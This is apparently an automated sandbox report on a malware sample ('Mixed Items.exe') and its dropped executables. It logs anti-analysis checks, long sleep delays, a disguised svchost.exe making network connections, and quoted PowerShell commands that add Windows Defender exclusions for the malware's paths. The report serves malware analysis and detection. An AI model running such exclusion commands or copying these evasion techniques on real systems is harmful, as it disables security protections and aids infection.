                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion:

                        Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Yara detected Beds Obfuscator
                        Source: Yara match | File source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000019.00000003.313769407.00000000037B0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000001F.00000002.476632403.00000000004D2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000001F.00000000.312425541.00000000004D2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, type: DROPPED
                        Source: Yara match | File source: 31.0.Matiexgoods.exe.4f277c.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 31.2.Matiexgoods.exe.4f277c.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 31.0.Matiexgoods.exe.4d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 31.2.Matiexgoods.exe.4d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
                        Source: C:\Windows\explorer.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: C:\Users\user\Desktop\Mixed Items.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Thread delayed: delay time: 300000
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1474
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 692
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 698
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 818
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 834
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 651
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Window / User API: threadDelayed 1333
                        Source: C:\Users\user\Desktop\Mixed Items.exe TID: 6304 | Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\Desktop\Mixed Items.exe TID: 6296 | Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\Desktop\Mixed Items.exe TID: 6272 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 6984 | Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5832 | Thread sleep time: -14757395258967632s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3252 | Thread sleep count: 698 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7124 | Thread sleep count: 59 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 492 | Thread sleep count: 818 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5272 | Thread sleep time: -15679732462653109s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4064 | Thread sleep count: 834 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5764 | Thread sleep count: 51 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 68 | Thread sleep count: 651 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3064 | Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 3748 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 6068 | Thread sleep time: -120000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 7116 | Thread sleep time: -140000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 6296 | Thread sleep time: -300000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 2420 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 2420 | Thread sleep count: 91 > 30
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 2420 | Thread sleep time: -2730000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 2420 | Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe TID: 2208 | Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe TID: 3704 | Thread sleep count: 193 > 30
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe TID: 3704 | Thread sleep count: 1333 > 30
                        Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | Last function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Last function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | File Volume queried: C:\ FullSizeInformation
                        Source: svchost.exe, 00000004.00000002.249976724.000002D794F40000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                        Source: svchost.exe, 00000006.00000002.524787300.000001FC10863000.00000004.00000001.sdmp | Binary or memory string: @Hyper-V RAW
                        Source: svchost.exe, 00000006.00000002.486898976.000001FC0B029000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
                        Source: svchost.exe, 00000004.00000002.249976724.000002D794F40000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                        Source: svchost.exe, 00000004.00000002.249976724.000002D794F40000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                        Source: svchost.exe, 00000012.00000002.487244262.0000028549869000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.535147129.0000000000C9B000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: svchost.exe, 00000004.00000002.249976724.000002D794F40000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                        Source: powershell.exe, 0000000A.00000002.528595657.000000000451C000.00000004.00000001.sdmp, powershell.exe, 0000000B.00000002.518621152.0000000004BEC000.00000004.00000001.sdmp | Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
                        Source: C:\Users\user\Desktop\Mixed Items.exe | Process information queried: ProcessInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Process queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_04D077F0 LdrInitializeThunk,
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe | Code function: 7_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                        Source: C:\Users\user\Desktop\Mixed Items.exe | Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe | Process token adjusted: Debug
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Process token adjusted: Debug
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe | Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\Mixed Items.exe | Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion:

                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe | Network Connect: 104.21.31.39 80
                        Adds a directory exclusion to Windows Defender
                        Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force
                        Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' -Force
                        Source: C:\Users\user\Desktop\Mixed Items.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force
                        Source: C:\Users\user\Desktop\Mixed Items.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' -Force
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe | Code function: 7_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,
                        Source: C:\Users\user\Desktop\Mixed Items.exe | Process created: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                        Source: C:\Users\user\Desktop\Mixed Items.exe | Process created: C:\Users\user\Desktop\Mixed Items.exe C:\Users\user\Desktop\Mixed Items.exe
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe | Process created: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe' /SpecialRun 4101d8 7032
                        Source: C:\Users\user\Desktop\Mixed Items.exe | Process created: C:\Users\user\AppData\Local\Temp\hawkgoods.exe 'C:\Users\user\AppData\Local\Temp\hawkgoods.exe' 0
                        Source: C:\Users\user\Desktop\Mixed Items.exe | Process created: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe 'C:\Users\user\AppData\Local\Temp\Matiexgoods.exe' 0
                        Source: C:\Users\user\Desktop\Mixed Items.exe | Process created: C:\Users\user\AppData\Local\Temp\origigoods20.exe 'C:\Users\user\AppData\Local\Temp\origigoods20.exe' 0
                        Source: C:\Users\user\Desktop\Mixed Items.exe | Process created: C:\Users\user\AppData\Local\Temp\origigoods40.exe 'C:\Users\user\AppData\Local\Temp\origigoods40.exe' 0
                        Source: C:\Users\user\Desktop\Mixed Items.exe | Process created: C:\Users\user\AppData\Local\Temp\Purchase Order.exe 'C:\Users\user\AppData\Local\Temp\Purchase Order.exe' 0
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Process created: unknown unknown
                        Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                        Source: C:\Users\user\Desktop\Mixed Items.exeQueries volume information: C:\Users\user\Desktop\Mixed Items.exe VolumeInformation
                        Source: C:\Users\user\Desktop\Mixed Items.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Mixed Items.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Mixed Items.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Mixed Items.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
